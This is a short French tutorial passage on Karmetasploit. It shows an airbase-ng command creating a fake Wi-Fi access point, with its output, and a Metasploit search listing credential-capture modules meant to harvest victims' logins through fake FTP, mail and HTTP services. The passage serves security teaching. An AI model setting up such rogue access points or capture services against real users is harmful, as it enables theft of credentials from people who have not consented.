Karmetasploit Karmetasploit
Le nombre vertigineux de réseaux Wi-Fi en fait une place de choix pour les attaquants. En effet, grâce à des outils faisant partie de la suite Aircrack-ng, il est devenu relativement simple de mettre en place un faux réseau Wi-Fi :
root@kali:~# airbase-ng -c 5 -e ENI wlan0mon
15:55:00 Created tap interface at0
15:55:00 Trying to set MTU on at0 to 1500
15:55:00 Trying to set MTU on wlan0mon to 1800
15:55:00 Access Point with BSSID 4E:EF:AA:3C:46:D8 started.
Dès lors et grâce à l’utilisation de techniques de social engineering, il est possible qu’un utilisateur se connecte sur ce point d’accès malveillant. Suite à la connexion de l’utilisateur sur le réseau Wi-Fi malveillant, Karmetasploit effectue deux actions distinctes :
-
Lancement de faux services non sécurisés (FTP, POP3, IMAP, SMTP ou encore HTTP) dans le but d’obtenir les identifiants des victimes grâce aux modules de type auxiliary/server/capture*
msf6 > search auxiliary/server/capture
Matching Modules
================
# Name
- ----
1 auxiliary/docx/word_unc_injector
2 auxiliary/fileformat/odt_badodt
3 auxiliary/scanner/sap/sap_smb_relay
4 auxiliary/server/capture/drda
5 auxiliary/server/capture/ftp
6 auxiliary/server/capture/http...